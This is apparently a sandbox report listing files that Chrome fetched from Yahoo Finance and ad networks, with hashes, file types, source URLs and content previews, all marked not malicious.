                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:LDlp03jDE8J7TqWxohK8kSLXJmq06gsuTldgK5V:flp+7edkSMFsGpL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9E530AE30640705B50966A2A28855386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9CBCA646FF8C62EA6036A135E90ECDB99D30F5F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DB4F17B34859E2C3E30356A67E7AFAD90BE4F071611BE719E8739FB3F2C04B7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FF1B39E734CB82A34683CCC2F87D960A6CDC90D7A4EFE9E506268FE5EB03FF720AD35749B56A2868BC6A197A0B8AF9F0F30BF7EBD4337BC911F8DA669C1BE194
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/LPQ_1T.gtbBgAzFw21rhGw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/aaa8fe20-85a3-11ef-b77d-220fee758bf5.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFFt...WEBPVP8 h........*d...>y6.H....(.J....M.P.......'.~(......hs...?.....{i..............._.?h=............./......}..............n......./..Bz.........o.r6H6........o.y.........=..........w..<..9.E...u..[.Q.v.}a..A.>m...vWqQ4R.RJN..^.M6b.l.=n.]..dPH&..i.e...;B8..y}...W.H.m...<o.....A[H^.ro7....8..7....2B..c3..].Q....=.p.t..2v.w.M...?.FG.RR..;c....t......KI2...@.....$.A/..6.H...i...;x..8....../)..9...........u.i.].A...<..{S.&[\...@v.....S.&>....^.........%....%...g.; ....k...s.....G[."......8...}Xd.h.k..y/._...i...qjt.A.Z..Rm.Z.X.o.hc.../.`..'k..r)}..H...XR}..e;r..1>.7ULk.<$.....Qn|".Sq_.4.)Vi.uE._..eXk#.+*.H.........+..J..k..!.......(T..T"F....."/..-w..c>d.S...W.2q...\.:U3.........W.sj.2..=.~.Z.j.......a.P;~.|54.'.o...s.pv[..../yv.{...F9m.]F....K_...K{...;....L.)ij..i7K..Z....a../..Q.(5//.\,x..MMe|.%....x.i..U..8.I.Q].a.H...9w.. ;.h/.W.H.....Ft.X...c/..k...k.j[.7=..clh....X..o...e..#.TW..7..n...e./2.TK.=2..=.....2.i..E8...l.o:....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3425)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3426
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3951713067293845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:/4BMVejpKWdmxd95ersyPsWw9XK7DkKNtI:/4yV4xmxd95er7Pl7DNtI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E0F00144D4E2AA3C2FBCA0C6D44DDBD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:03834B8FF5D252B5A4DB76510B95B60FE7ED8558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9E7968299D74BAEDB5403FAF77738E625EADA63B057BB4B7C9C487798CEF479C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CED36799B0EBD9EB00D09F28333034F987AD1A21BE784ED09E7B875F1E385E3DE118021857B713CC04F88BBF71647E736C9D7D89FBB9865E59D7314DAA5CAF27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as j,p as h,k,i as d,c as T,A as q,b as C,j as F,u as w,g as z,a as N,t as I,h as O,m as R}from"./scheduler.Dr9AAxFe.js";import{S as W,i as v,g as B,a as m,e as D,t as c,c as V,b as E,m as p,d as A}from"./index.DCSmZEjO.js";import{g as G,a as H}from"./spread.CgU5AtxT.js";import{A as L}from"./arrow_forward.8N8VOjY3.js";import{L as S}from"./Link.Cll6KZpb.js";import{t as J}from"./commonUtil.CI22_Irn.js";function K(a){let l,t,i;const s=a[9].default,n=T(s,a,a[10],null),r=[{className:a[4]},{href:a[0]},{"aria-label":a[6]},{size:a[8][a[5]]},{i13nModel:a[1]},{title:a[6]},{variant:"subtle"},{icon:L},{"data-testid":a[2]},a[3]?{"data-sveltekit-reload":""}:{}];let u={$$slots:{default:[Q]},$$scope:{ctx:a}};for(let e=0;e<r.length;e+=1)u=q(u,r[e]);return t=new S({props:u}),{c(){n&&n.c(),l=C(),V(t.$$.fragment)},l(e){n&&n.l(e),l=F(e),E(t.$$.fragment,e)},m(e,o){n&&n.m(e,o),k(e,l,o),p(t,e,o),i=!0},p(e,o){n&&n.p&&(!i||o&1024)&&w(n,s,e,e[10],i?N(s,e[10],o,null):z(e[10]),null);const _=o&383?G(r,[o&1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1055)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2690
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.39866636776827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:76A4D84DE75340D59CA06503A14184D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FE3C4A95AF88BE57D1912BB09DC463F69924402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537073061&val=4155905375263972214&gdpr=0&gdpr_consent=&us_privacy=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://dt.adsafeprotected.com/dt?advEntityId=2233400&asId=38c6b108-4dfa-76fb-59d4-d5cea654b422&tv=%7Bc:qyx5VN,pingTime:1,time:5426,type:p,clog:%5B%7Bpiv:0,vs:o,r:r,w:728,h:90,t:111%7D,%7Bpiv:100,vs:i,r:,t:4415%7D%5D,es:0,sc:1,ha:1,fgad:1,fif:0,gmnp:0,for:0,b11:0,cnod:1,gm:0,slTimes:%7Bi:1011,o:4415,n:0,pp:0,pm:0%7D,slEvents:%5B%7Bsl:o,t:111,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:0,obst:0,th:0,reas:r,bkn:%7Bpiv:%5B4372~0%5D,as:%5B4372~728.90%5D%7D%7D,%7Bsl:i,t:4415,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:100,obst:0,th:0,reas:,bkn:%7Bpiv:%5B1012~100%5D,as:%5B1012~728.90%5D%7D%7D%5D,slEventCount:2,em:true,fr:false,e:,tt:rjss,dtt:2690,fm:uqDOUlz+11%7C12%7C13%7C14%7C151%7C16%7C1711%7C1712%7C1713%7C1714%7C1715%7C1716%7C1717%7C1718%7C1719%7C171a%7C171b%7C171c%7C171d%7C171e%7C171f%7C171g%7C171h%7C171i%7C171j%7C171k%7C172%7C1731%7C1732%7C18%7C19%7C1a1%7C1a2%7C1a3%7C1a4%7C1a5%7C1a6%7C1b%7C1c%7C1d%7C1e%7C1f%7C1g11%7C1g12%7C1g2%7C1h%7C1i%7C1j%7C1k%7C1l1%7C1m%7C1n%7C1o%7C1p%7C1q%7C1r*.2233400-82744863%7C1r1,idMap:1r*,rmeas:1,rend:1,renddet:DIV.qs.sn,siq:121,sis:3872%7D&br=c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.169765616109217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:DdTCIsqDmJS4RKb5ykKcvXjXRHoNcHNzlQCvp8kXXULuFXFXNdGnVILctIXfqoFM:D59mc4sl3O4hlSkn9uoc6XfqNx1zv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1D3D69E47D7CC57EDF818E89BBCF6976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C277CD1CC35C28EC8E9E82D301426235A206F090
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AF029A2C41985307F5CDD45E78D7CDCB8F6A88B74E28624C606A645A87F45A5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AAA87B6AC8459582D70707075E3CB4A9F63CDD1A5E3AD83D1A5DB3A5CBDD6A7BD32B38C70B11B0C4E3B0844CA6266EA17E61C3E8C4905931FB1FDAC2AE1D9ECE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M16 9v10H8V9zm-1.5-6h-5l-1 1H5v2h14V4h-3.5zM18 7H6v12c0 1.1.9 2 2 2h8c1.1 0 2-.9 2-2z"/></svg>';export{v as D};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (8038)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8039
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.486770517057192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:tHy8y/LYhr+Yujso8nxuhdPcDS+ZMqfJErXYoBo3Lq2qJysfGBPqVqiLPaIqI3VY:tS8y/shAI8PQFGXnB6ejJysfGBiEiLPO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E33983E6FFB533453DF21766BACCB20E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2E3B3EBA7F3EB96F1113E2D9CCE6FDEDF0C6416C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DF1838F810AF1CC5D3205BB5937CA805F3EE5E21460C48455C008DC2945382F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EAA1B9A5C49BCFAEC2F945C9FCE21E96003E594F059495FC028C09965350E936C0FC5390DEB36C66BEBCCDE456C750D92BFCB411D9F253092C4F6B8A3071883B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/MenuSurface.82i0Hwps.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ve,A as H,P as te,a0 as ke,e as T,b as ne,d as Y,f as G,j as le,i as E,q as h,_ as F,k as J,l as R,G as Ie,R as ze,Y as y,O as Ee,I as Be,T as Ae,c as se,u as ie,g as oe,a as ae,a6 as p,t as De,h as Se}from"./scheduler.Dr9AAxFe.js";import{S as Fe,i as Pe,h as qe,c as fe,b as ce,m as ue,t as C,g as me,a as N,e as de,d as re}from"./index.DCSmZEjO.js";import{g as Le,a as je}from"./spread.CgU5AtxT.js";import{B as ge}from"./Button.DpT5MMuf.js";import{t as w}from"./commonUtil.CI22_Irn.js";import{C as Ve}from"./close.C3ug6nNR.js";import{c as Te,o as Ye,f as Ge,s as Re}from"./floating-ui.dom.C5fi-pG6.js";const He=e=>({isDisplayed:e[0]&524288}),x=e=>({isDisplayed:e[19]});function Je(e){let t;const n=e[31].default,s=se(n,e,e[34],null);return{c(){s&&s.c()},l(o){s&&s.l(o)},m(o,a){s&&s.m(o,a),t=!0},p(o,a){s&&s.p&&(!t||a[1]&8)&&ie(s,n,o,o[34],t?ae(n,o[34],a,null):oe(o[34]),null)},i(o){t||(C(s,o),t=!0)},o(o){N(s,o),t=!1},d(o){s&&s.d(o)}}}function $(e){let t,n,s=e[3]&&ee(e);const o=e[31].c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12794)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.750086708656384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:Nj5MW0ZbWbSrFp9lZlU/mVh2hnfZFnfeg2K1yKb7KWbuWbybTWbScuZ9txegRsbl:jMWSbkoVAsI7KkukybTk+uR3ZB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:77177E7567C08417B81204A8311AAD73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:649A09E1197890BB97C6962110368E04A65C01D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A409B01A7FD7EB0E2680BF208F4B129AAC9EE8C70F8AE949147E615D81E59784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5EFF2854C0B5F74684C27207754D6391F2C6D298629CB0E3D3873C793B1CB9EE1969AA56D864505EF1460DFD95364863CC9BDA7507E17D5A009B455F7538AD25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Link.CHR7GGSC.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:a.yf-1e4diqp{--link-transition-duration:.15s;transition-property:background-color,background-image,box-shadow,color,border-color;transition-duration:var(--link-transition-duration);transition-timing-function:ease-in-out;height:-moz-fit-content;height:fit-content;font-weight:var(--link-font-weight, var(--font-medium));text-decoration:none;display:inline-flex;gap:var(--space-1);align-items:center;line-height:1.25;width:var(--custom-width)}a.primary-link.yf-1e4diqp,a.loud-link.yf-1e4diqp,a.subtle-link.yf-1e4diqp,a.none-link.yf-1e4diqp{--link-transition-duration:60ms;padding:var(--link-padding, 0)}a.primary-link.fin-size-x-small.yf-1e4diqp,a.loud-link.fin-size-x-small.yf-1e4diqp,a.subtle-link.fin-size-x-small.yf-1e4diqp,a.none-link.fin-size-x-small.yf-1e4diqp{--link-padding:0;font-size:var(--font-xs)}a.primary-link.fin-size-small.yf-1e4diqp,a.loud-link.fin-size-small.yf-1e4diqp,a.subtle-link.fin-size-small.yf-1e4diqp,a.none-link.fin-size-small.yf-1e4diqp{--link-padding:0;font-size:var(--fo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?kdntuid=1&p=133799&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):250251
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.549831311146834
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:PJZxsUI5Y/fX+0U6RWLjyJDaPe7sj4jN5p8e:RZgoGNjyBWusUjN5pJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BDCCEAADE54B153AAC2AA3697A64E5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:98DA8D2675C231B224B8B8A2BADF878558D0C45D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:936F3CA4B1E977D43DDC8D3B26DD7551DCCC82E082BA494A2B185A7C4F9CB1A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4EC02D1B5809D0661F8EAF1549C80ADAE4FD1FE6EBA64A47BAD9F06560D3A7B2585E2B35A2F9F33BFD5F1C4B9B2AD20340055FFD895468C204BBE5D0B00F70CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://r1---sn-ab5sznzs.c.2mdn.net/videoplayback/id/33d715245e99c20b/itag/59/source/web_video_ads/xpc/EgVovf3BOg%3D%3D/ctier/L/acao/yes/ip/0.0.0.0/ipbits/0/expire/1759950966/sparams/acao,ctier,expire,id,ip,ipbits,itag,met,mh,mip,mm,mn,ms,mv,mvi,pl,rms,source,xpc/signature/202277E95EBB0D40AB81AEEFE4752E91DB2A1A97.5CD28CFB9970AF77D01DE780FA8AB5131F8CA1C3/key/cms1/cms_redirect/yes/met/1728414973,/mh/me/mip/8.46.123.33/mm/42/mn/sn-ab5sznzs/ms/onc/mt/1728412994/mv/u/mvi/1/pl/23/rms/onc,onc/file/file.mp4:2f829240fb5f70:0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....ftypmp42....isommp42....moov...lmvhd...................j................................................@...................................trak...\tkhd.......................X................................................@..............emdia... mdhd..............<.....U......Ghdlr........vide............ISO Media file produced by Google Inc......minf...$dinf....dref............url ........stbl....stsd............avc1.............................H...H...............................................4avcC.M@.....gM@....g.l..............x.,\....h. ....stts...................4stsc...............................................Lstco..............r........&../....3...Z......=z.............Y........p...\stsz.......................=.......A...r...........|...}...~.......f...............|...v...............q...N...C...I...D...I...O...C...?.......x...........R...P...S...O...M...L...M...M...M...N...L...1...r...:.......V...f..._...v...........Z...F...C...A...A..(........;...3...........K...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
